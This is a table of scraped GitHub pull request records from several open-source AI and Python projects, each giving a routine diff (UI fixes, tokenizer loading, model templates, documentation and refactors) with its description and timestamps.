| title | diff | body | url | created_at | closed_at | merged_at | updated_at | diff_len | repo_name | __index_level_0__ |
|---|---|---|---|---|---|---|---|---|---|---|
handle 0 wheel deltaY | diff --git a/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js b/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
index 64e7a638a4c..b0963f4fe2c 100644
--- a/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
+++ b/extensions-builtin/canvas-zoom-and-pan/javascript/zoom.js
@@ -793,7 +793,7 @@ onUiLoaded(async() => {
targetElement.addEventListener("wheel", e => {
// change zoom level
- const operation = e.deltaY > 0 ? "-" : "+";
+ const operation = (e.deltaY || -e.wheelDelta) > 0 ? "-" : "+";
changeZoomLevel(operation, e);
// Handle brush size adjustment with ctrl key pressed
| ## Description
I ran into a strange bug: when scrolling on a remote PC via a VNC remote desktop, I wasn't able to zoom out. I found that this was because `deltaY` was always 0; with a real mouse everything works fine.
It's not strictly necessary to fix this here, since the bug is rare and is really a VNC problem, but I think nothing will break with this change.
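The fallback behavior can be illustrated in isolation. This is a minimal sketch, not the extension's actual code: the event is modeled as a plain dict whose keys mirror the DOM `WheelEvent` fields, where some environments report `deltaY` as 0 and only populate the legacy `wheelDelta` field (which has the opposite sign).

```python
def zoom_operation(event):
    # Prefer the standard deltaY; if it is 0 (or missing), fall back to the
    # legacy wheelDelta, negating it because its sign convention is inverted.
    delta = event.get("deltaY") or -event.get("wheelDelta", 0)
    return "-" if delta > 0 else "+"

print(zoom_operation({"deltaY": 100}))                   # "-" (zoom out)
print(zoom_operation({"deltaY": 0, "wheelDelta": 120}))  # "+" (zoom in)
```

With a real mouse `deltaY` is nonzero and the fallback never triggers, so existing behavior is unchanged.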
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/15268 | 2024-03-15T08:11:39Z | 2024-03-16T15:25:00Z | 2024-03-16T15:25:00Z | 2024-03-17T01:44:35Z | 186 | AUTOMATIC1111/stable-diffusion-webui | 39,859 |
Merge dev branch | diff --git a/.github/workflows/stale.yml b/.github/workflows/stale.yml
index 2de6d955a3..fee541962d 100644
--- a/.github/workflows/stale.yml
+++ b/.github/workflows/stale.yml
@@ -13,8 +13,8 @@ jobs:
- uses: actions/stale@v5
with:
stale-issue-message: ""
- close-issue-message: "This issue has been closed due to inactivity for 6 weeks. If you believe it is still relevant, please leave a comment below. You can tag a developer in your comment."
- days-before-issue-stale: 42
+ close-issue-message: "This issue has been closed due to inactivity for 2 months. If you believe it is still relevant, please leave a comment below. You can tag a developer in your comment."
+ days-before-issue-stale: 60
days-before-issue-close: 0
stale-issue-label: "stale"
days-before-pr-stale: -1
diff --git a/modules/models.py b/modules/models.py
index 038669f3c8..d8f1a9f815 100644
--- a/modules/models.py
+++ b/modules/models.py
@@ -254,26 +254,17 @@ def llamacpp_loader(model_name):
def llamacpp_HF_loader(model_name):
from modules.llamacpp_hf import LlamacppHF
- for fname in [model_name, "oobabooga_llama-tokenizer", "llama-tokenizer"]:
- path = Path(f'{shared.args.model_dir}/{fname}')
- if all((path / file).exists() for file in ['tokenizer_config.json', 'special_tokens_map.json', 'tokenizer.model']):
- logger.info(f'Using tokenizer from: \"{path}\"')
- break
+ path = Path(f'{shared.args.model_dir}/{model_name}')
+
+ # Check if a HF tokenizer is available for the model
+ if all((path / file).exists() for file in ['tokenizer.model', 'tokenizer_config.json']):
+ logger.info(f'Using tokenizer from: \"{path}\"')
else:
- logger.error("Could not load the model because a tokenizer in transformers format was not found. Please download oobabooga/llama-tokenizer.")
+ logger.error("Could not load the model because a tokenizer in Transformers format was not found.")
return None, None
- if shared.args.no_use_fast:
- logger.info('Loading the tokenizer with use_fast=False.')
-
- tokenizer = AutoTokenizer.from_pretrained(
- path,
- trust_remote_code=shared.args.trust_remote_code,
- use_fast=not shared.args.no_use_fast
- )
-
model = LlamacppHF.from_pretrained(model_name)
- return model, tokenizer
+ return model
def ctransformers_loader(model_name):
diff --git a/modules/ui_model_menu.py b/modules/ui_model_menu.py
index 2367909773..387915b1a1 100644
--- a/modules/ui_model_menu.py
+++ b/modules/ui_model_menu.py
@@ -143,7 +143,7 @@ def create_ui():
shared.gradio['disable_exllamav2'] = gr.Checkbox(label="disable_exllamav2", value=shared.args.disable_exllamav2, info='Disable ExLlamav2 kernel for GPTQ models.')
shared.gradio['gptq_for_llama_info'] = gr.Markdown('Legacy loader for compatibility with older GPUs. ExLlamav2_HF or AutoGPTQ are preferred for GPTQ models when supported.')
shared.gradio['exllamav2_info'] = gr.Markdown("ExLlamav2_HF is recommended over ExLlamav2 for better integration with extensions and more consistent sampling behavior across loaders.")
- shared.gradio['llamacpp_HF_info'] = gr.Markdown('llamacpp_HF loads llama.cpp as a Transformers model. To use it, you need to download a tokenizer.\n\nOption 1 (recommended): place your .gguf in a subfolder of models/ along with these 4 files: special_tokens_map.json, tokenizer_config.json, tokenizer.json, tokenizer.model.\n\nOption 2: download `oobabooga/llama-tokenizer` under "Download model or LoRA". That\'s a default Llama tokenizer that will work for some (but not all) models.')
+ shared.gradio['llamacpp_HF_info'] = gr.Markdown("llamacpp_HF loads llama.cpp as a Transformers model. To use it, download a tokenizer in HF format for your GGUF:\n\n1. Create a folder inside models/\n2. Place your GGUF in the new folder.\n3. Add the original model's tokenizer files there: `tokenizer.model`, `tokenizer_config.json`, `tokenizer.json`, and `special_tokens_map.json`.")
with gr.Column():
with gr.Row():
diff --git a/requirements.txt b/requirements.txt
index 1b09063433..3a16e1ef0d 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -50,11 +50,11 @@ https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu1
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.11"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.10"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system != "Darwin" and platform_machine != "x86_64"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system == "Linux" and platform_machine != "x86_64"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/Dao-AILab/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu122torch2.1cxx11abiFALSE-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
diff --git a/requirements_noavx2.txt b/requirements_noavx2.txt
index 386fbe9e62..4d9caf3604 100644
--- a/requirements_noavx2.txt
+++ b/requirements_noavx2.txt
@@ -50,11 +50,11 @@ https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu1
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/jllllll/AutoGPTQ/releases/download/v0.6.0/auto_gptq-0.6.0+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.11"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and platform_machine == "x86_64" and python_version == "3.10"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1+cu121-cp310-cp310-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.10"
-https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system != "Darwin" and platform_machine != "x86_64"
+https://github.com/oobabooga/exllamav2/releases/download/v0.0.13.1/exllamav2-0.0.13.1-py3-none-any.whl; platform_system == "Linux" and platform_machine != "x86_64"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp311-cp311-win_amd64.whl; platform_system == "Windows" and python_version == "3.11"
https://github.com/jllllll/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu121torch2.1cxx11abiFALSE-cp310-cp310-win_amd64.whl; platform_system == "Windows" and python_version == "3.10"
https://github.com/Dao-AILab/flash-attention/releases/download/v2.3.4/flash_attn-2.3.4+cu122torch2.1cxx11abiFALSE-cp311-cp311-linux_x86_64.whl; platform_system == "Linux" and platform_machine == "x86_64" and python_version == "3.11"
| https://api.github.com/repos/oobabooga/text-generation-webui/pulls/5502 | 2024-02-14T14:32:31Z | 2024-02-14T14:32:58Z | 2024-02-14T14:32:58Z | 2024-02-14T14:32:59Z | 3,257 | oobabooga/text-generation-webui | 26,796 | |
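The simplified tokenizer lookup in the `llamacpp_HF_loader` diff above can be sketched as a standalone check. The required file list is taken from the diff; the directory layout and function name are illustrative assumptions:

```python
from pathlib import Path

# Files the loader now requires in the model's own folder (no more fallback
# to a shared oobabooga/llama-tokenizer directory).
REQUIRED_FILES = ["tokenizer.model", "tokenizer_config.json"]

def has_hf_tokenizer(model_dir: str, model_name: str) -> bool:
    # True only if every required HF tokenizer file sits next to the GGUF.
    path = Path(model_dir) / model_name
    return all((path / f).exists() for f in REQUIRED_FILES)
```

If the check fails, the loader logs an error and returns nothing instead of silently substituting a default Llama tokenizer.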
Bugfix to Tool - Mask - add missing | diff --git a/tools/mask.py b/tools/mask.py
index 550cad1858..b276a67424 100644
--- a/tools/mask.py
+++ b/tools/mask.py
@@ -214,7 +214,7 @@ def _input_frames(self, *args):
detected_faces.append(detected_face)
self._update_count += 1
if self._update_type != "output":
- queue.put(ExtractMedia(filename, image, detected_faces=[detected_face]))
+ queue.put(ExtractMedia(filename, image, detected_faces=detected_faces))
if self._update_type != "output":
queue.put("EOF")
| Corrects an error caused by a variable misspelling. | https://api.github.com/repos/deepfakes/faceswap/pulls/953 | 2019-12-11T03:06:35Z | 2019-12-15T12:49:51Z | 2019-12-15T12:49:51Z | 2019-12-15T12:49:51Z | 144 | deepfakes/faceswap | 18,776 |
Minor improvements | diff --git a/__init__.py b/__init__.py
deleted file mode 100644
index e69de29b..00000000
diff --git a/structural/mvc.py b/structural/mvc.py
index 42137ef7..b7bdfd68 100644
--- a/structural/mvc.py
+++ b/structural/mvc.py
@@ -1,7 +1,9 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
+
class Model(object):
+
def __iter__(self):
raise NotImplementedError
@@ -15,20 +17,21 @@ def item_type(self):
raise NotImplementedError
-
class ProductModel(Model):
class Price(float):
- """A polymorphic way to pass a float with a particular __str__ functionality."""
+ """A polymorphic way to pass a float with a particular
+ __str__ functionality."""
+
def __str__(self):
- first_digits_str = str(round(self,2))
+ first_digits_str = str(round(self, 2))
try:
dot_location = first_digits_str.index('.')
except ValueError:
return (first_digits_str + '.00')
else:
return (first_digits_str +
- '0'*(3 + dot_location - len(first_digits_str)))
+ '0' * (3 + dot_location - len(first_digits_str)))
products = {
'milk': {'price': Price(1.50), 'quantity': 10},
@@ -48,7 +51,9 @@ def get(self, product):
except KeyError as e:
raise KeyError((str(e) + " not in the model's item list."))
+
class View(object):
+
def show_item_list(self, item_type, item_list):
raise NotImplementedError
@@ -60,6 +65,7 @@ def show_item_information(self, item_type, item_name, item_info):
def item_not_found(self, item_type, item_name):
raise NotImplementedError
+
class ConsoleView(View):
def show_item_list(self, item_type, item_list):
@@ -81,7 +87,8 @@ def show_item_information(self, item_type, item_name, item_info):
print(printout)
def item_not_found(self, item_type, item_name):
- print('That %s "%s" does not exist in the records' % (item_type, item_name))
+ print('That %s "%s" does not exist in the records' %
+ (item_type, item_name))
class Controller(object):
diff --git a/tests/test_adapter.py b/tests/test_adapter.py
index da3fdc38..e9f3884f 100644
--- a/tests/test_adapter.py
+++ b/tests/test_adapter.py
@@ -9,8 +9,7 @@
class ClassTest(unittest.TestCase):
- @classmethod
- def setUpClass(self):
+ def setUp(self):
self.dog = Dog()
self.cat = Cat()
self.human = Human()
@@ -43,40 +42,40 @@ def test_car_shall_make_very_loud_noise(self):
class AdapterTest(unittest.TestCase):
- def test_dog_adapter_shall_make_noise(self):
- dog = Dog()
- dog_adapter = Adapter(dog, make_noise=dog.bark)
- noise = dog_adapter.make_noise()
- expected_noise = "woof!"
- self.assertEqual(noise, expected_noise)
+ def test_dog_adapter_shall_make_noise(self):
+ dog = Dog()
+ dog_adapter = Adapter(dog, make_noise=dog.bark)
+ noise = dog_adapter.make_noise()
+ expected_noise = "woof!"
+ self.assertEqual(noise, expected_noise)
- def test_cat_adapter_shall_make_noise(self):
- cat = Cat()
- cat_adapter = Adapter(cat, make_noise=cat.meow)
- noise = cat_adapter.make_noise()
- expected_noise = "meow!"
- self.assertEqual(noise, expected_noise)
+ def test_cat_adapter_shall_make_noise(self):
+ cat = Cat()
+ cat_adapter = Adapter(cat, make_noise=cat.meow)
+ noise = cat_adapter.make_noise()
+ expected_noise = "meow!"
+ self.assertEqual(noise, expected_noise)
- def test_human_adapter_shall_make_noise(self):
- human = Human()
- human_adapter = Adapter(human, make_noise=human.speak)
- noise = human_adapter.make_noise()
- expected_noise = "'hello'"
- self.assertEqual(noise, expected_noise)
+ def test_human_adapter_shall_make_noise(self):
+ human = Human()
+ human_adapter = Adapter(human, make_noise=human.speak)
+ noise = human_adapter.make_noise()
+ expected_noise = "'hello'"
+ self.assertEqual(noise, expected_noise)
- def test_car_adapter_shall_make_loud_noise(self):
- car = Car()
- car_adapter = Adapter(car, make_noise=car.make_noise)
- noise = car_adapter.make_noise(1)
- expected_noise = "vroom!"
- self.assertEqual(noise, expected_noise)
+ def test_car_adapter_shall_make_loud_noise(self):
+ car = Car()
+ car_adapter = Adapter(car, make_noise=car.make_noise)
+ noise = car_adapter.make_noise(1)
+ expected_noise = "vroom!"
+ self.assertEqual(noise, expected_noise)
- def test_car_adapter_shall_make_very_loud_noise(self):
- car = Car()
- car_adapter = Adapter(car, make_noise=car.make_noise)
- noise = car_adapter.make_noise(10)
- expected_noise = "vroom!!!!!!!!!!"
- self.assertEqual(noise, expected_noise)
+ def test_car_adapter_shall_make_very_loud_noise(self):
+ car = Car()
+ car_adapter = Adapter(car, make_noise=car.make_noise)
+ noise = car_adapter.make_noise(10)
+ expected_noise = "vroom!!!!!!!!!!"
+ self.assertEqual(noise, expected_noise)
if __name__ == "__main__":
unittest.main()
| Hi!
Without a doubt, a pattern collection is a great idea to implement and keep on hand. I hope my humble corrections are useful.
As a next step I hope to:
- Extend test coverage;
- Run the existing code through PEP 8.
Best regards. | https://api.github.com/repos/faif/python-patterns/pulls/167 | 2017-01-06T11:29:12Z | 2017-01-07T15:50:09Z | 2017-01-07T15:50:09Z | 2017-01-07T15:50:09Z | 1,337 | faif/python-patterns | 33,622 |
Add SOLAR-10.7b Instruct Model | diff --git a/fastchat/conversation.py b/fastchat/conversation.py
index 6a277fa31e..784dbe9ed0 100644
--- a/fastchat/conversation.py
+++ b/fastchat/conversation.py
@@ -1341,6 +1341,19 @@ def get_conv_template(name: str) -> Conversation:
)
)
+# Solar-10.7B Chat Template
+# Reference: https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0/blob/main/tokenizer_config.json
+register_conv_template(
+ Conversation(
+ name="solar",
+ system_message="",
+ roles=("### User", "### Assistant"),
+ sep_style=SeparatorStyle.ADD_NEW_LINE_SINGLE,
+ sep="\n\n",
+ stop_str="</s>",
+ )
+)
+
if __name__ == "__main__":
from fastchat.conversation import get_conv_template
diff --git a/fastchat/model/model_adapter.py b/fastchat/model/model_adapter.py
index 78e6c2c8cd..477ebf2246 100644
--- a/fastchat/model/model_adapter.py
+++ b/fastchat/model/model_adapter.py
@@ -1989,6 +1989,16 @@ def get_default_conv_template(self, model_path: str) -> Conversation:
return get_conv_template("metamath")
+class SolarAdapter(BaseModelAdapter):
+ """The model adapter for upstage/SOLAR-10.7B-Instruct-v1.0"""
+
+ def match(self, model_path: str):
+ return "solar-" in model_path.lower() and "instruct" in model_path.lower()
+
+ def get_default_conv_template(self, model_path: str) -> Conversation:
+ return get_conv_template("solar")
+
+
# Note: the registration order matters.
# The one registered earlier has a higher matching priority.
register_model_adapter(PeftModelAdapter)
@@ -2065,6 +2075,7 @@ def get_default_conv_template(self, model_path: str) -> Conversation:
register_model_adapter(DeepseekCoderAdapter)
register_model_adapter(DeepseekChatAdapter)
register_model_adapter(MetaMathAdapter)
+register_model_adapter(SolarAdapter)
# After all adapters, try the default base adapter.
register_model_adapter(BaseModelAdapter)
diff --git a/fastchat/model/model_registry.py b/fastchat/model/model_registry.py
index 7f392c596d..8bd99b2551 100644
--- a/fastchat/model/model_registry.py
+++ b/fastchat/model/model_registry.py
@@ -441,3 +441,10 @@ def get_model_info(name: str) -> ModelInfo:
"https://huggingface.co/meta-math",
"MetaMath is a finetune of Llama2 on [MetaMathQA](https://huggingface.co/datasets/meta-math/MetaMathQA) that specializes in mathematical reasoning.",
)
+
+register_model_info(
+ ["upstage/SOLAR-10.7B-Instruct-v1.0"],
+ "SOLAR-10.7B-Instruct",
+ "https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0",
+ "A Llama2 fine-tune developed by upstage.ai that incorporates depth up-scaling.",
+)
| ## Why are these changes needed?
Adds the latest model from upstage.ai: https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0 that performs very well on eval leaderboards.
Example output:
<img width="1645" alt="image" src="https://github.com/lm-sys/FastChat/assets/49086305/b784727a-9040-4554-a9a7-6fc2d9f9cc40">
| https://api.github.com/repos/lm-sys/FastChat/pulls/2826 | 2023-12-17T19:45:33Z | 2023-12-17T22:38:16Z | 2023-12-17T22:38:16Z | 2023-12-17T22:38:16Z | 723 | lm-sys/FastChat | 41,665 |
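The matching rule added in `SolarAdapter` can be exercised on its own. The predicate is copied from the diff; the model paths below are illustrative examples:

```python
def matches_solar(model_path: str) -> bool:
    # Case-insensitive match: the path must name a SOLAR model AND the
    # instruct variant, so the base (non-chat) model falls through to
    # other adapters.
    p = model_path.lower()
    return "solar-" in p and "instruct" in p

print(matches_solar("upstage/SOLAR-10.7B-Instruct-v1.0"))  # True
print(matches_solar("upstage/SOLAR-10.7B-v1.0"))           # False
```

Because registration order sets matching priority, the adapter is registered before the catch-all `BaseModelAdapter` so this predicate is consulted first.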
DOCS: core editable dep api refs | diff --git a/docs/api_reference/requirements.txt b/docs/api_reference/requirements.txt
index d2a4e1cd7f017f..59acb6901930fb 100644
--- a/docs/api_reference/requirements.txt
+++ b/docs/api_reference/requirements.txt
@@ -1,5 +1,6 @@
-e libs/langchain
-e libs/experimental
+-e libs/core
pydantic<2
autodoc_pydantic==1.8.0
myst_parser
| https://api.github.com/repos/langchain-ai/langchain/pulls/13747 | 2023-11-22T22:27:58Z | 2023-11-22T22:33:30Z | 2023-11-22T22:33:30Z | 2023-11-24T08:11:37Z | 109 | langchain-ai/langchain | 43,318 | |
add docs for templates | diff --git a/libs/cli/pyproject.toml b/libs/cli/pyproject.toml
index d90c65906f5d9d..31991b73c75421 100644
--- a/libs/cli/pyproject.toml
+++ b/libs/cli/pyproject.toml
@@ -1,6 +1,6 @@
[tool.poetry]
name = "langchain-cli"
-version = "0.0.1rc2"
+version = "0.0.3"
description = "CLI for interacting with LangChain"
authors = ["Erick Friis <erick@langchain.dev>"]
readme = "README.md"
diff --git a/templates/CONTRIBUTING.md b/templates/CONTRIBUTING.md
new file mode 100644
index 00000000000000..f7171265f3b11b
--- /dev/null
+++ b/templates/CONTRIBUTING.md
@@ -0,0 +1,18 @@
+# Contributing
+
+To add a new project:
+
+Make sure you have `langchain-cli` installed.
+
+```shell
+pip install -U langchain-cli
+```
+
+Create a new package
+
+```shell
+langchain hub new $PROJECT_NAME
+```
+
+This will set up the skeleton of a package.
+You can then edit the contents of the package as you desire.
diff --git a/templates/INDEX.md b/templates/INDEX.md
index ae70ec85f9941e..2b79bc835aea1f 100644
--- a/templates/INDEX.md
+++ b/templates/INDEX.md
@@ -3,7 +3,11 @@
A list of all template repos
⭐Retrieval Augmented Generation Chatbot: Build a chatbot over your data. Uses OpenAI and Pinecone.
+
⭐Extraction with OpenAI Functions: Do extraction of structured data from unstructured data. Uses OpenAI function calling.
+
⭐Local Retrieval Augmented Generation: Build a chatbot over your data. Uses only local tooling: Ollama, GPT4all, Chroma.
+
⭐OpenAI Functions Agent: Build a chatbot that can take actions. Uses OpenAI function calling and Tavily.
+
⭐XML Agent: Build a chatbot that can take actions. Uses Anthropic and You.com.
diff --git a/templates/README.md b/templates/README.md
index 9404a53812811b..f5974ae1488a0f 100644
--- a/templates/README.md
+++ b/templates/README.md
@@ -1,71 +1,74 @@
-# LangServe Hub
+# LangServe Templates
-Packages that can be easily hosted by LangServe using the `langserve` cli.
+Templates for a fully functioning app that can be hosted by LangServe.
-## Using LangServe Hub
+## Usage
-You can install the `langservehub` CLI and use it as follows:
-```bash
-# install langservehub CLI
-pip install --upgrade langservehub
+To use, first install the LangChain CLI.
-langservehub new my-app
-cd my-app
+```shell
+pip install -U langchain-cli
+```
-poetry install
+Then, install `langserve`:
-# if you have problems with poe, use `poetry run poe ...` instead
+```shell
+pip install "langserve[all]"
+```
-# add the simple-pirate package
-poe add --repo=pingpong-templates/hub simple-pirate
+Next, create a new LangChain project:
-# adding other GitHub repo packages, defaults to repo root
-poe add --repo=hwchase17/chain-of-verification
+```shell
+langchain serve new my-app
+```
-# with a custom api mount point (defaults to `/{package_name}`)
-poe add --repo=pingpong-templates/hub simple-translator --api_path=/my/custom/path/translator
+This will create a new directory called `my-app` with two folders:
-poe list
+- `app`: This is where LangServe code will live
+- `packages`: This is where your chains or agents will live
-poe start
-^C
+To pull in an existing template as a package, you first need to go into your new project:
-# remove packages by their api path:
-poe remove my/custom/path/translator
+```shell
+cd my-app
```
-## Creating New Packages
+And you can then add a template as a project
-You can also create new packages with the `langservehub package new` command
-
-```bash
-# starting from this directory in langserve-hub
-langservehub package new simple-newpackage
+```shell
+langchain serve add $PROJECT_NAME
```
-Now you can edit the chain in `simple-newpackage/simple_newpackage/chain.py` and put up a PR!
-
-Your package will be usable as `poe add --repo=pingpong-templates/hub simple-newpackage` when it's merged in.
+This will pull in the specified template into `packages/$PROJECT_NAME`
-## Data Format
+You then need to install this package so you can use it in the langserve app:
-What makes these packages work?
+```shell
+pip install -e packages/$PROJECT_NAME
+```
-- Poetry
-- pyproject.toml files
+We install it with `-e` so that if we modify the template at all (which we likely will) the changes are updated.
-### Installable Packages
+In order to have LangServe use this project, you then need to modify `app/server.py`.
+Specifically, you should add something like:
-Everything is a Poetry package currently. This allows poetry to manage our dependencies for us :).
+```python
+from fastapi import FastAPI
+from langserve import add_routes
+# This depends on the structure of the package you install
+from my_project import chain
-In addition to normal keys in the `pyproject.toml` file, you'll notice an additional `tool.langserve` key ([link](https://github.com/langchain-ai/langserve-hub/blob/main/simple/pirate/pyproject.toml#L13-L15)).
+app = FastAPI()
-This allows us to identify which module and attribute to import as the chain/runnable for the langserve `add_routes` call.
+add_routes(app, chain)
+```
-### Apps (with installed langserve packages)
+You can then spin up production-ready endpoints, along with a playground, by running:
-Let's say you add the pirate package with `poe add --repo=pingpong-templates/hub simple-pirate`.
+```shell
+python app/server.py
+```
-First this downloads the simple-pirate package to pirate
+## Adding a template
-Then this adds a `poetry` path dependency, which gets picked up from `add_package_routes`.
\ No newline at end of file
+See [here](CONTRIBUTING.md)
| https://api.github.com/repos/langchain-ai/langchain/pulls/12346 | 2023-10-26T15:26:11Z | 2023-10-26T15:28:01Z | 2023-10-26T15:28:01Z | 2023-10-26T15:28:02Z | 1,542 | langchain-ai/langchain | 43,639 | |
Chat simplifications | diff --git a/modules/chat.py b/modules/chat.py
index c4703236f4..6801741abb 100644
--- a/modules/chat.py
+++ b/modules/chat.py
@@ -10,7 +10,6 @@
import yaml
from PIL import Image
-import modules.extensions as extensions_module
import modules.shared as shared
from modules.extensions import apply_extensions
from modules.html_generator import chat_html_wrapper, make_thumbnail
@@ -30,8 +29,8 @@ def generate_chat_prompt(user_input, state, **kwargs):
chat_prompt_size = state['chat_prompt_size']
if shared.soft_prompt:
chat_prompt_size -= shared.soft_prompt_tensor.shape[1]
- max_length = min(get_max_prompt_length(state), chat_prompt_size)
+ max_length = min(get_max_prompt_length(state), chat_prompt_size)
if is_instruct:
prefix1 = f"{state['name1']}\n"
prefix2 = f"{state['name2']}\n"
@@ -57,7 +56,6 @@ def generate_chat_prompt(user_input, state, **kwargs):
min_rows = 2
rows.append(f"{prefix1.strip() if not is_instruct else prefix1}")
elif not _continue:
-
# Adding the user message
if len(user_input) > 0:
this_prefix1 = prefix1.replace('<|round|>', f'{len(shared.history["internal"])}') # for ChatGLM
@@ -68,8 +66,8 @@ def generate_chat_prompt(user_input, state, **kwargs):
while len(rows) > min_rows and len(encode(''.join(rows))[0]) >= max_length:
rows.pop(1)
- prompt = ''.join(rows)
+ prompt = ''.join(rows)
if also_return_rows:
return prompt, rows
else:
@@ -81,6 +79,7 @@ def get_stopping_strings(state):
stopping_strings = [f"\n{state['name1']}", f"\n{state['name2']}"]
else:
stopping_strings = [f"\n{state['name1']}:", f"\n{state['name2']}:"]
+
stopping_strings += ast.literal_eval(f"[{state['custom_stopping_strings']}]")
return stopping_strings
@@ -111,13 +110,13 @@ def extract_message_from_reply(reply, state):
break
else:
continue
+
break
return reply, next_character_found
def chatbot_wrapper(text, state, regenerate=False, _continue=False):
-
if shared.model_name == 'None' or shared.model is None:
print("No model is loaded! Select one in the Model tab.")
yield shared.history['visible']
@@ -125,18 +124,30 @@ def chatbot_wrapper(text, state, regenerate=False, _continue=False):
# Defining some variables
cumulative_reply = ''
- last_reply = [shared.history['internal'][-1][1], shared.history['visible'][-1][1]] if _continue else None
just_started = True
visible_text = None
eos_token = '\n' if state['stop_at_newline'] else None
stopping_strings = get_stopping_strings(state)
- text, visible_text = apply_extensions('input_hijack', text, visible_text)
+ # Preparing the input
+ if not any((regenerate, _continue)):
+ text, visible_text = apply_extensions('input_hijack', text, visible_text)
+ if visible_text is None:
+ visible_text = text
- if visible_text is None:
- visible_text = text
- if not _continue:
- text = apply_extensions("input", text)
+ text = apply_extensions('input', text)
+ # *Is typing...*
+ yield shared.history['visible'] + [[visible_text, shared.processing_message]]
+ else:
+ text, visible_text = shared.history['internal'][-1][0], shared.history['visible'][-1][0]
+ if regenerate:
+ shared.history['visible'].pop()
+ shared.history['internal'].pop()
+ # *Is typing...*
